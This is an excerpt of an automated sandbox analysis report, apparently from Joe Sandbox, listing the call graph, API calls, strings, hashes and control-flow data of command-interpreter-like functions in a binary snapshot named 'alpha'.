7ff6e942bf0c 22446->22452 22449 7ff6e942cd90 166 API calls 22447->22449 22453 7ff6e942c620 243 API calls 22448->22453 22457 7ff6e942bea1 22448->22457 22451 7ff6e942bf33 22449->22451 22450->22441 22454 7ff6e942bff0 185 API calls 22450->22454 22451->22450 22458 7ff6e942bf70 22451->22458 22461 7ff6e94288a8 _wcsicmp 22451->22461 22551 7ff6e942b0d8 memset 22452->22551 22453->22457 22454->22441 22457->22450 22464 7ff6e942af98 2 API calls 22457->22464 22468 7ff6e942bf75 22458->22468 22611 7ff6e94271ec 22458->22611 22459 7ff6e942bf1e 22459->22450 22463 7ff6e942bf5a 22461->22463 22462 7ff6e942bfa9 22462->22450 22465 7ff6e942cd90 166 API calls 22462->22465 22463->22458 22466 7ff6e9430a6c 273 API calls 22463->22466 22464->22450 22467 7ff6e942bfbb 22465->22467 22466->22458 22467->22450 22469 7ff6e943081c 166 API calls 22467->22469 22470 7ff6e942b0d8 194 API calls 22468->22470 22469->22468 22471 7ff6e942bf7f 22470->22471 22471->22450 22484 7ff6e9435ad8 22471->22484 22475 7ff6e944c775 22474->22475 22480 7ff6e944c7ab 22474->22480 22476 7ff6e942cd90 166 API calls 22475->22476 22478 7ff6e944c781 22476->22478 22477 7ff6e944c8d4 22477->22424 22478->22477 22479 7ff6e942b0d8 194 API calls 22478->22479 22479->22477 22480->22477 22480->22478 22481 7ff6e942b6b0 170 API calls 22480->22481 22482 7ff6e942b038 _dup2 22480->22482 22483 7ff6e942d208 _close 22480->22483 22481->22480 22482->22480 22483->22480 22485 7ff6e942cd90 166 API calls 22484->22485 22486 7ff6e9435b12 22485->22486 22512 7ff6e9435b8b 22486->22512 22617 7ff6e942cb40 22486->22617 22488 7ff6e9438f80 7 API calls 22490 7ff6e942bf99 22488->22490 22490->22457 22491 7ff6e9430a6c 273 API calls 22492 7ff6e9435b43 22491->22492 22493 7ff6e9435bb8 22492->22493 22494 7ff6e9435b48 GetConsoleTitleW 22492->22494 22496 7ff6e9435bbd GetConsoleTitleW 22493->22496 22497 7ff6e9435bf4 22493->22497 22621 7ff6e942cad4 22494->22621 22500 7ff6e942cad4 172 API calls 22496->22500 22499 7ff6e943f452 22497->22499 22503 7ff6e9435bfd 22497->22503 22504 7ff6e9433c24 166 API calls 22499->22504 22501 7ff6e9435bdb 22500->22501 22505 7ff6e94296e8 645 API calls 22501->22505 22507 7ff6e9435c1b 22503->22507 22508 7ff6e943f462 22503->22508 22503->22512 22504->22512 22506 7ff6e9435b7f 22505->22506 22511 7ff6e9435c3c SetConsoleTitleW 22506->22511 22509 7ff6e9423278 166 API calls 22507->22509 22510 7ff6e9423278 166 API calls 22508->22510 22509->22512 22510->22512 22511->22512 22512->22488 22514 7ff6e942c01c 22513->22514 22515 7ff6e942c0c4 22513->22515 22516 7ff6e942c086 22514->22516 22517 7ff6e942c022 22514->22517 22515->22444 22521 7ff6e942c144 22516->22521 22532 7ff6e942c094 22516->22532 22518 7ff6e942c030 22517->22518 22519 7ff6e942c113 22517->22519 22520 7ff6e942c039 wcschr 22518->22520 22534 7ff6e942c053 22518->22534 22530 7ff6e942ff70 2 API calls 22519->22530 22519->22534 22522 7ff6e942c301 22520->22522 22520->22534 22525 7ff6e942c151 22521->22525 22540 7ff6e942c1c8 22521->22540 22529 7ff6e942cd90 166 API calls 22522->22529 22523 7ff6e942c058 22535 7ff6e942ff70 2 API calls 22523->22535 22538 7ff6e942c073 22523->22538 22524 7ff6e942c0c6 22528 7ff6e942c0cf wcschr 22524->22528 22524->22538 22708 7ff6e942c460 22525->22708 22527 7ff6e942c460 183 API calls 22527->22532 22533 7ff6e942c1be 22528->22533 22528->22538 22550 7ff6e942c30b 22529->22550 22530->22534 22532->22515 22532->22527 22536 7ff6e942cd90 166 API calls 22533->22536 22534->22523 22534->22524 22542 7ff6e942c211 22534->22542 22535->22538 22536->22540 22537 7ff6e942c460 183 API calls 22537->22515 22538->22515 22539 7ff6e942c460 183 API calls 22538->22539 22539->22538 22540->22515 22541 7ff6e942c285 22540->22541 22540->22542 22547 7ff6e942d840 178 API calls 22540->22547 22541->22542 22546 7ff6e942b6b0 170 API calls 22541->22546 22543 7ff6e942ff70 2 API calls 22542->22543 22543->22515 22544 7ff6e942d840 178 API calls 22544->22550 22545 7ff6e942b6b0 170 API calls 22545->22534 22548 7ff6e942c2ac 22546->22548 22547->22540 22548->22538 22548->22542 22549 7ff6e942c3d4 22549->22538 22549->22542 22549->22545 22550->22515 22550->22542 22550->22544 22550->22549 22552 7ff6e942ca40 17 API calls 22551->22552 22567 7ff6e942b162 22552->22567 22553 7ff6e942b2f7 ??_V@YAXPEAX 22554 7ff6e942b303 22553->22554 22556 7ff6e9438f80 7 API calls 22554->22556 22555 7ff6e942b1d9 22559 7ff6e942cd90 166 API calls 22555->22559 22574 7ff6e942b1ed 22555->22574 22558 7ff6e942b315 22556->22558 22557 7ff6e9431ea0 8 API calls 22557->22567 22558->22448 22558->22459 22559->22574 22561 7ff6e943bfef _get_osfhandle SetFilePointer 22564 7ff6e943c01d 22561->22564 22561->22574 22562 7ff6e942b228 _get_osfhandle 22563 7ff6e942b23f _get_osfhandle 22562->22563 22562->22574 22563->22574 22566 7ff6e94333f0 _vsnwprintf 22564->22566 22569 7ff6e943c038 22566->22569 22567->22555 22567->22557 22567->22567 22582 7ff6e942b2e1 22567->22582 22568 7ff6e94301b8 6 API calls 22568->22574 22573 7ff6e9423278 166 API calls 22569->22573 22570 7ff6e94333f0 _vsnwprintf 22570->22569 22571 7ff6e942d208 _close 22571->22574 22572 7ff6e94326e0 19 API calls 22572->22574 22575 7ff6e943c1f9 22573->22575 22574->22561 22574->22562 22574->22568 22574->22571 22574->22572 22577 7ff6e942b038 _dup2 22574->22577 22578 7ff6e943c060 22574->22578 22579 7ff6e943c246 22574->22579 22580 7ff6e943c1a5 22574->22580 22574->22582 22586 7ff6e942b356 22574->22586 22599 7ff6e943c1c3 22574->22599 22722 7ff6e942affc _dup 22574->22722 22724 7ff6e944f318 _get_osfhandle GetFileType 22574->22724 22576 7ff6e942af98 2 API calls 22575->22576 22576->22582 22577->22574 22578->22579 22584 7ff6e94309f4 2 API calls 22578->22584 22581 7ff6e942af98 2 API calls 22579->22581 22583 7ff6e942b038 _dup2 22580->22583 22585 7ff6e943c24b 22581->22585 22582->22553 22582->22554 22587 7ff6e943c1b7 22583->22587 22588 7ff6e943c084 22584->22588 22589 7ff6e944f1d8 166 API calls 22585->22589 22595 7ff6e942af98 2 API calls 22586->22595 22590 7ff6e943c207 22587->22590 22591 7ff6e943c1be 22587->22591 22592 7ff6e942b900 166 API calls 22588->22592 22589->22582 22594 7ff6e942d208 _close 22590->22594 22596 7ff6e942d208 _close 22591->22596 22593 7ff6e943c08c 22592->22593 22597 7ff6e943c094 wcsrchr 22593->22597 22610 7ff6e943c0ad 22593->22610 22594->22586 22598 7ff6e943c211 22595->22598 22596->22599 22597->22610 22600 7ff6e94333f0 _vsnwprintf 22598->22600 22599->22570 22601 7ff6e943c22c 22600->22601 22602 7ff6e9423278 166 API calls 22601->22602 22602->22582 22603 7ff6e943c106 22604 7ff6e942ff70 2 API calls 22603->22604 22606 7ff6e943c13b 22604->22606 22605 7ff6e943c0e0 _wcsnicmp 22605->22610 22606->22579 22607 7ff6e943c146 SearchPathW 22606->22607 22607->22579 22608 7ff6e943c188 22607->22608 22609 7ff6e94326e0 19 API calls 22608->22609 22609->22580 22610->22603 22610->22605 22612 7ff6e9427279 22611->22612 22614 7ff6e9427211 _setjmp 22611->22614 22612->22462 22614->22612 22615 7ff6e9427265 22614->22615 22725 7ff6e94272b0 22615->22725 22618 7ff6e942cb63 22617->22618 22619 7ff6e942cd90 166 API calls 22618->22619 22620 7ff6e942cb99 22619->22620 22620->22491 22620->22512 22622 7ff6e942cad9 22621->22622 22623 7ff6e942cb05 22621->22623 22622->22623 22624 7ff6e942cd90 166 API calls 22622->22624 22633 7ff6e9434224 InitializeProcThreadAttributeList 22623->22633 22625 7ff6e943c722 22624->22625 22625->22623 22626 7ff6e943c72e GetConsoleTitleW 22625->22626 22626->22623 22627 7ff6e943c74a 22626->22627 22628 7ff6e942b6b0 170 API calls 22627->22628 22632 7ff6e943c778 22628->22632 22629 7ff6e943c7ec 22630 7ff6e942ff70 2 API calls 22629->22630 22630->22623 22631 7ff6e943c7dd SetConsoleTitleW 22631->22629 22632->22629 22632->22631 22634 7ff6e94342ab UpdateProcThreadAttribute 22633->22634 22635 7ff6e943ecd4 GetLastError 22633->22635 22636 7ff6e94342eb memset memset GetStartupInfoW 22634->22636 22637 7ff6e943ecf0 GetLastError 22634->22637 22638 7ff6e943ecee 22635->22638 22640 7ff6e9433a90 170 API calls 22636->22640 22706 7ff6e9449eec 22637->22706 22642 7ff6e94343a8 22640->22642 22643 7ff6e942b900 166 API calls 22642->22643 22644 7ff6e94343bb 22643->22644 22645 7ff6e9434638 _local_unwind 22644->22645 22646 7ff6e94343cc 22644->22646 22645->22646 22647 7ff6e94343de wcsrchr 22646->22647 22648 7ff6e9434415 22646->22648 22647->22648 22649 7ff6e94343f7 lstrcmpW 22647->22649 22693 7ff6e9435a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22648->22693 22649->22648 22651 7ff6e9434668 22649->22651 22694 7ff6e9449044 22651->22694 22652 7ff6e943441a 22654 7ff6e943442a CreateProcessW 22652->22654 22656 7ff6e9434596 CreateProcessAsUserW 22652->22656 22655 7ff6e943448b 22654->22655 22657 7ff6e9434495 CloseHandle 22655->22657 22658 7ff6e9434672 GetLastError 22655->22658 22656->22655 22659 7ff6e943498c 8 API calls 22657->22659 22663 7ff6e943468d 22658->22663 22660 7ff6e94344c5 22659->22660 22661 7ff6e94344cd 22660->22661 22660->22663 22662 7ff6e94347a3 22661->22662 22680 7ff6e944a250 33 API calls 22661->22680 22684 7ff6e94344f8 22661->22684 22662->22506 22663->22661 22664 7ff6e942cd90 166 API calls 22663->22664 22665 7ff6e9434724 22664->22665 22668 7ff6e943472c _local_unwind 22665->22668 22673 7ff6e943473d 22665->22673 22666 7ff6e9435cb4 7 API calls 22670 7ff6e9434517 22666->22670 22667 7ff6e943461c 22671 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22667->22671 22668->22673 22669 7ff6e94347e1 CloseHandle 22669->22667 22672 7ff6e94333f0 _vsnwprintf 22670->22672 22674 7ff6e94347fa DeleteProcThreadAttributeList 22671->22674 22675 7ff6e9434544 22672->22675 22681 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22673->22681 22676 7ff6e9438f80 7 API calls 22674->22676 22677 7ff6e943498c 8 API calls 22675->22677 22678 7ff6e9434820 22676->22678 22679 7ff6e9434558 22677->22679 22678->22506 22682 7ff6e94347ae 22679->22682 22683 7ff6e9434564 22679->22683 22680->22684 22686 7ff6e943475b _local_unwind 22681->22686 22685 7ff6e94333f0 _vsnwprintf 22682->22685 22687 7ff6e943498c 8 API calls 22683->22687 22684->22662 22684->22666 22689 7ff6e9434612 22684->22689 22685->22689 22686->22661 22688 7ff6e9434577 22687->22688 22688->22667 22690 7ff6e943457f 22688->22690 22689->22667 22689->22669 22691 7ff6e944a920 210 API calls 22690->22691 22692 7ff6e9434584 22691->22692 22692->22667 22695 7ff6e9433a90 170 API calls 22694->22695 22696 7ff6e9449064 22695->22696 22697 7ff6e944906e 22696->22697 22699 7ff6e9449083 22696->22699 22698 7ff6e943498c 8 API calls 22697->22698 22700 7ff6e9449081 22698->22700 22701 7ff6e942cd90 166 API calls 22699->22701 22700->22648 22702 7ff6e944909b 22701->22702 22702->22700 22703 7ff6e943498c 8 API calls 22702->22703 22704 7ff6e94490ec 22703->22704 22705 7ff6e942ff70 2 API calls 22704->22705 22705->22700 22707 7ff6e943ed0a DeleteProcThreadAttributeList 22706->22707 22707->22638 22709 7ff6e942c4c9 22708->22709 22710 7ff6e942c486 22708->22710 22714 7ff6e942ff70 2 API calls 22709->22714 22715 7ff6e942c161 22709->22715 22711 7ff6e942c48e wcschr 22710->22711 22710->22715 22712 7ff6e942c4ef 22711->22712 22711->22715 22713 7ff6e942cd90 166 API calls 22712->22713 22721 7ff6e942c4f9 22713->22721 22714->22715 22715->22515 22715->22537 22716 7ff6e942c5bd 22717 7ff6e942c541 22716->22717 22719 7ff6e942b6b0 170 API calls 22716->22719 22717->22715 22718 7ff6e942ff70 2 API calls 22717->22718 22718->22715 22719->22717 22720 7ff6e942d840 178 API calls 22720->22721 22721->22715 22721->22716 22721->22717 22721->22720 22721->22721 22723 7ff6e942b018 22722->22723 22723->22574 22724->22574 22726 7ff6e9444621 22725->22726 22727 7ff6e94272de 22725->22727 22731 7ff6e944447b longjmp 22726->22731 22732 7ff6e9444639 22726->22732 22749 7ff6e94447e0 22726->22749 22752 7ff6e944475e 22726->22752 22728 7ff6e94272eb 22727->22728 22736 7ff6e9444467 22727->22736 22737 7ff6e9444530 22727->22737 22786 7ff6e9427348 22728->22786 22730 7ff6e9427348 168 API calls 22735 7ff6e9444524 22730->22735 22733 7ff6e9444492 22731->22733 22738 7ff6e944463e 22732->22738 22739 7ff6e9444695 22732->22739 22740 7ff6e9427348 168 API calls 22733->22740 22745 7ff6e94272b0 168 API calls 22735->22745 22754 7ff6e9427323 22735->22754 22736->22728 22736->22733 22748 7ff6e9444475 22736->22748 22741 7ff6e9427348 168 API calls 22737->22741 22738->22731 22750 7ff6e9444654 22738->22750 22747 7ff6e94273d4 168 API calls 22739->22747 22760 7ff6e94444a8 22740->22760 22761 7ff6e9444549 22741->22761 22742 7ff6e9427315 22801 7ff6e94273d4 22742->22801 22743 7ff6e9427348 168 API calls 22743->22749 22744 7ff6e9427348 168 API calls 22744->22742 22753 7ff6e944480e 22745->22753 22764 7ff6e944469a 22747->22764 22748->22731 22748->22739 22749->22730 22762 7ff6e9427348 168 API calls 22750->22762 22751 7ff6e94445b2 22755 7ff6e9427348 168 API calls 22751->22755 22752->22743 22753->22612 22754->22612 22758 7ff6e94445c7 22755->22758 22756 7ff6e944455e 22756->22751 22765 7ff6e9427348 168 API calls 22756->22765 22757 7ff6e94446e1 22763 7ff6e94272b0 168 API calls 22757->22763 22766 7ff6e9427348 168 API calls 22758->22766 22759 7ff6e94444e2 22768 7ff6e94272b0 168 API calls 22759->22768 22760->22759 22767 7ff6e9427348 168 API calls 22760->22767 22761->22751 22761->22756 22775 7ff6e9427348 168 API calls 22761->22775 22762->22754 22769 7ff6e9444738 22763->22769 22764->22757 22776 7ff6e94446c7 22764->22776 22777 7ff6e94446ea 22764->22777 22765->22751 22771 7ff6e94445db 22766->22771 22767->22759 22772 7ff6e94444f1 22768->22772 22770 7ff6e9427348 168 API calls 22769->22770 22770->22735 22773 7ff6e9427348 168 API calls 22771->22773 22774 7ff6e94272b0 168 API calls 22772->22774 22778 7ff6e94445ec 22773->22778 22779 7ff6e9444503 22774->22779 22775->22756 22776->22757 22783 7ff6e9427348 168 API calls 22776->22783 22780 7ff6e9427348 168 API calls 22777->22780 22781 7ff6e9427348 168 API calls 22778->22781 22779->22754 22782 7ff6e9427348 168 API calls 22779->22782 22780->22757 22784 7ff6e9444600 22781->22784 22782->22735 22783->22757 22785 7ff6e9427348 168 API calls 22784->22785 22785->22735 22789 7ff6e942735d 22786->22789 22787 7ff6e9423278 166 API calls 22788 7ff6e9444820 longjmp 22787->22788 22790 7ff6e9444838 22788->22790 22789->22787 22789->22789 22789->22790 22800 7ff6e94273ab 22789->22800 22791 7ff6e9423278 166 API calls 22790->22791 22792 7ff6e9444844 longjmp 22791->22792 22793 7ff6e944485a 22792->22793 22794 7ff6e9427348 166 API calls 22793->22794 22795 7ff6e944487b 22794->22795 22796 7ff6e9427348 166 API calls 22795->22796 22797 7ff6e94448ad 22796->22797 22798 7ff6e9427348 166 API calls 22797->22798 22799 7ff6e94272ff 22798->22799 22799->22742 22799->22744 22802 7ff6e9427401 22801->22802 22802->22754 22803 7ff6e9427348 168 API calls 22802->22803 22804 7ff6e944487b 22803->22804 22805 7ff6e9427348 168 API calls 22804->22805 22806 7ff6e94448ad 22805->22806 22807 7ff6e9427348 168 API calls 22806->22807 22808 7ff6e94448be 22807->22808 22808->22754

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00007FF6E9430A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                                                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                                                                        • API String ID: 3305344409-4288247545
                                                                                                                                                                        • Opcode ID: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                                                                                                                                                        • Instruction ID: d8c265ddad6b4c801b0f1a3f7ced96ce76b96d14dc3697a63a894a568eea3a58
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                                                                                                                                                        • Instruction Fuzzy Hash: 174290A3A08682C5EB65DF3198183B967A0AF89B94F444234D91EC77D5DF3EE54CC30A
                                                                                                                                                                        Function 00007FF6E942AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 216 7ff6e942aa54-7ff6e942aa98 call 7ff6e942cd90 219 7ff6e943bf5a-7ff6e943bf70 call 7ff6e9434c1c call 7ff6e942ff70 216->219 220 7ff6e942aa9e 216->220 221 7ff6e942aaa5-7ff6e942aaa8 220->221 223 7ff6e942acde-7ff6e942ad00 221->223 224 7ff6e942aaae-7ff6e942aac8 wcschr 221->224 229 7ff6e942ad06 223->229 224->223 226 7ff6e942aace-7ff6e942aae9 towlower 224->226 226->223 228 7ff6e942aaef-7ff6e942aaf3 226->228 231 7ff6e942aaf9-7ff6e942aafd 228->231 232 7ff6e943beb7-7ff6e943bec4 call 7ff6e944eaf0 228->232 233 7ff6e942ad0d-7ff6e942ad1f 229->233 235 7ff6e943bbcf 231->235 236 7ff6e942ab03-7ff6e942ab07 231->236 248 7ff6e943bec6-7ff6e943bed8 call 7ff6e9423240 232->248 249 7ff6e943bf43-7ff6e943bf59 call 7ff6e9434c1c 232->249 237 7ff6e942ad22-7ff6e942ad2a call 7ff6e94313e0 233->237 243 7ff6e943bbde 235->243 239 7ff6e942ab09-7ff6e942ab0d 236->239 240 7ff6e942ab7d-7ff6e942ab81 236->240 237->221 245 7ff6e943be63 239->245 246 7ff6e942ab13-7ff6e942ab17 239->246 244 7ff6e942ab87-7ff6e942ab95 240->244 240->245 255 7ff6e943bbea-7ff6e943bbec 243->255 251 7ff6e942ab98-7ff6e942aba0 244->251 258 7ff6e943be72-7ff6e943be88 call 7ff6e9423278 call 7ff6e9434c1c 245->258 246->240 252 7ff6e942ab19-7ff6e942ab1d 246->252 248->249 263 7ff6e943beda-7ff6e943bee9 call 7ff6e9423240 248->263 249->219 251->251 256 7ff6e942aba2-7ff6e942abb3 call 7ff6e942cd90 251->256 252->243 257 7ff6e942ab23-7ff6e942ab27 252->257 265 7ff6e943bbf8-7ff6e943bc01 255->265 256->219 270 7ff6e942abb9-7ff6e942abde call 7ff6e94313e0 call 7ff6e94333a8 256->270 257->255 261 7ff6e942ab2d-7ff6e942ab31 257->261 279 7ff6e943be89-7ff6e943be8c 258->279 261->229 267 7ff6e942ab37-7ff6e942ab3b 261->267 273 7ff6e943beeb-7ff6e943bef1 263->273 274 7ff6e943bef3-7ff6e943bef9 263->274 265->233 267->265 271 7ff6e942ab41-7ff6e942ab45 267->271 308 7ff6e942abe4-7ff6e942abe7 270->308 309 7ff6e942ac75 270->309 276 7ff6e943bc06-7ff6e943bc2a call 7ff6e94313e0 271->276 277 7ff6e942ab4b-7ff6e942ab4f 271->277 273->249 273->274 274->249 280 7ff6e943befb-7ff6e943bf0d call 7ff6e9423240 274->280 297 7ff6e943bc2c-7ff6e943bc4c _wcsnicmp 276->297 298 7ff6e943bc5a-7ff6e943bc61 276->298 283 7ff6e942ad2f-7ff6e942ad33 277->283 284 7ff6e942ab55-7ff6e942ab78 call 7ff6e94313e0 277->284 285 7ff6e942acbe 279->285 286 7ff6e943be92-7ff6e943beaa call 7ff6e9423278 call 7ff6e9434c1c 279->286 280->249 306 7ff6e943bf0f-7ff6e943bf21 call 7ff6e9423240 280->306 290 7ff6e942ad39-7ff6e942ad3d 283->290 291 7ff6e943bc66-7ff6e943bc8a call 7ff6e94313e0 283->291 284->221 293 7ff6e942acc0-7ff6e942acc7 285->293 337 7ff6e943beab-7ff6e943beb6 call 7ff6e9434c1c 286->337 300 7ff6e943bcde-7ff6e943bd02 call 7ff6e94313e0 290->300 301 7ff6e942ad43-7ff6e942ad49 290->301 314 7ff6e943bc8c-7ff6e943bcaa _wcsnicmp 291->314 315 7ff6e943bcc4-7ff6e943bcdc 291->315 293->293 303 7ff6e942acc9-7ff6e942acda 293->303 297->298 307 7ff6e943bc4e-7ff6e943bc55 297->307 312 7ff6e943bd31-7ff6e943bd4f _wcsnicmp 298->312 331 7ff6e943bd2a 300->331 332 7ff6e943bd04-7ff6e943bd24 _wcsnicmp 300->332 310 7ff6e943bd5e-7ff6e943bd65 301->310 311 7ff6e942ad4f-7ff6e942ad68 301->311 303->223 306->249 339 7ff6e943bf23-7ff6e943bf35 call 7ff6e9423240 306->339 322 7ff6e943bbb3-7ff6e943bbb7 307->322 308->285 324 7ff6e942abed-7ff6e942ac0b call 7ff6e942cd90 * 2 308->324 319 7ff6e942ac77-7ff6e942ac7f 309->319 310->311 323 7ff6e943bd6b-7ff6e943bd73 310->323 325 7ff6e942ad6d-7ff6e942ad70 311->325 326 7ff6e942ad6a 311->326 320 7ff6e943bd55 312->320 321 7ff6e943bbc2-7ff6e943bbca 312->321 314->315 329 7ff6e943bcac-7ff6e943bcbf 314->329 315->312 319->285 328 7ff6e942ac81-7ff6e942ac85 319->328 320->310 321->221 333 7ff6e943bbba-7ff6e943bbbd call 7ff6e94313e0 322->333 334 7ff6e943bd79-7ff6e943bd8b iswxdigit 323->334 335 7ff6e943be4a-7ff6e943be5e 323->335 324->337 356 7ff6e942ac11-7ff6e942ac14 324->356 325->237 326->325 340 7ff6e942ac88-7ff6e942ac8f 328->340 329->322 331->312 332->331 338 7ff6e943bbac 332->338 333->321 334->335 342 7ff6e943bd91-7ff6e943bda3 iswxdigit 334->342 335->333 337->232 338->322 339->249 357 7ff6e943bf37-7ff6e943bf3e call 7ff6e9423240 339->357 340->340 346 7ff6e942ac91-7ff6e942ac94 340->346 342->335 348 7ff6e943bda9-7ff6e943bdbb iswxdigit 342->348 346->285 353 7ff6e942ac96-7ff6e942acaa wcsrchr 346->353 348->335 349 7ff6e943bdc1-7ff6e943bdd7 iswdigit 348->349 354 7ff6e943bdd9-7ff6e943bddd 349->354 355 7ff6e943bddf-7ff6e943bdeb towlower 349->355 353->285 358 7ff6e942acac-7ff6e942acb9 call 7ff6e9431300 353->358 359 7ff6e943bdee-7ff6e943be0f iswdigit 354->359 355->359 356->337 360 7ff6e942ac1a-7ff6e942ac33 memset 356->360 357->249 358->285 363 7ff6e943be17-7ff6e943be23 towlower 359->363 364 7ff6e943be11-7ff6e943be15 359->364 360->309 365 7ff6e942ac35-7ff6e942ac4b wcschr 360->365 366 7ff6e943be26-7ff6e943be45 call 7ff6e94313e0 363->366 364->366 365->309 367 7ff6e942ac4d-7ff6e942ac54 365->367 366->335 368 7ff6e942ac5a-7ff6e942ac6f wcschr 367->368 369 7ff6e942ad72-7ff6e942ad91 wcschr 367->369 368->309 368->369 371 7ff6e942ad97-7ff6e942adac wcschr 369->371 372 7ff6e942af03-7ff6e942af07 369->372 371->372 373 7ff6e942adb2-7ff6e942adc7 wcschr 371->373 372->309 373->372 374 7ff6e942adcd-7ff6e942ade2 wcschr 373->374 374->372 375 7ff6e942ade8-7ff6e942adfd wcschr 374->375 375->372 376 7ff6e942ae03-7ff6e942ae18 wcschr 375->376 376->372 377 7ff6e942ae1e-7ff6e942ae21 376->377 378 7ff6e942ae24-7ff6e942ae27 377->378 378->372 379 7ff6e942ae2d-7ff6e942ae40 iswspace 378->379 380 7ff6e942ae4b-7ff6e942ae5e 379->380 381 7ff6e942ae42-7ff6e942ae49 379->381 382 7ff6e942ae66-7ff6e942ae6d 380->382 381->378 382->382 383 7ff6e942ae6f-7ff6e942ae77 382->383 383->258 384 7ff6e942ae7d-7ff6e942ae97 call 7ff6e94313e0 383->384 387 7ff6e942ae9a-7ff6e942aea4 384->387 388 7ff6e942aea6-7ff6e942aead 387->388 389 7ff6e942aebc-7ff6e942aef8 call 7ff6e9430a6c call 7ff6e942ff70 * 2 387->389 388->389 390 7ff6e942aeaf-7ff6e942aeba 388->390 389->319 397 7ff6e942aefe 389->397 390->387 390->389 397->279
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                        • String ID: :$:$:$:ON$OFF
                                                                                                                                                                        • API String ID: 972821348-467788257
                                                                                                                                                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                        • Instruction ID: 9c40596f1326973e12df33aee824721af9d8f43258b3750f73bc2f4b8dc03744
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                        • Instruction Fuzzy Hash: 95229E63A18642D6FB64DF7598183B86691FF49B80F488035CA0EC77D5DE3EA44CC35A
                                                                                                                                                                        Function 00007FF6E94351EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
